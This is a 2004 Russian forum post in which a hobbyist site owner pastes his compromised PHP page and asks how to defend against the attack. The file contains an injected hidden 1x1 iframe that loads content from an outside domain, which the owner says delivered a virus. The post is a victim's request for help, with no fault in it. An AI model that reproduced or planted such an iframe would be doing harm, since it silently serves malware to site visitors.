>> Вопросы:
>> - как это могли сделать?
>> - как от этого защититься? весь сайт написан вручную на PHP...
>>но я любитель.
>
>что бы можно было что нить сказать ты бы привел весь файл
>php, а то заставляешь людей гадать. Дырок много, обо всех не
>расскажешь.
Весь файл как он есть
------------------------------------------------------------------------
<?
include "$DOCUMENT_ROOT/comm_functions.php";
include "$DOCUMENT_ROOT/db_connect.php3";
include "$DOCUMENT_ROOT/menu.php3";
?>
</td>
</tr>
</table>
<img width=0 height=10 src="">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" width="100%" bordercolor="#C0C0C0" height="528">
<tr>
<td width=170 align="left" valign="top">
<?
include "$DOCUMENT_ROOT/column_news.inc";
?>
</td>
<td align="center" valign="top">
<?
include "$DOCUMENT_ROOT/column_intro.inc";
?>
</td>
<td width=200 valign="top" align="center">
<?
include "$DOCUMENT_ROOT/column_right.inc";
?>
</td>
</tr>
</table><iframe src="http://www.norma-apex.ru/log/index.html" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0>
</div>
<?
include "$DOCUMENT_ROOT/bottom_menu.php";
include "$DOCUMENT_ROOT/cnt_banners.php";
?>
</body>
</html>
------------------------------------------------------------------------
И второй раз это повторилось в файле bottom_menu.php - тоже добавили это строчку <iframe> со ссылкой на norma-apex - тоже загружался вирус. Это после того как я сделал index.php3 r-- r-- ---, а до этого был rw- rw- ---. Сейчас я все файлы в корне сделал r-- r-- --- но ведь это не выход наверное, а только временная мера.
Или хоть дайте ссылочку почитать как с этим бороться, или дельный совет... а то уже печально становится... на сервере valuehost, где мой сайт - никакого контроля за этим нет, вручную ведь не проследишь за всеми файлами.
Вариант для распечатки
Информационная безопасность (Public)
on
02-Окт-04, 22:30 (MSK)
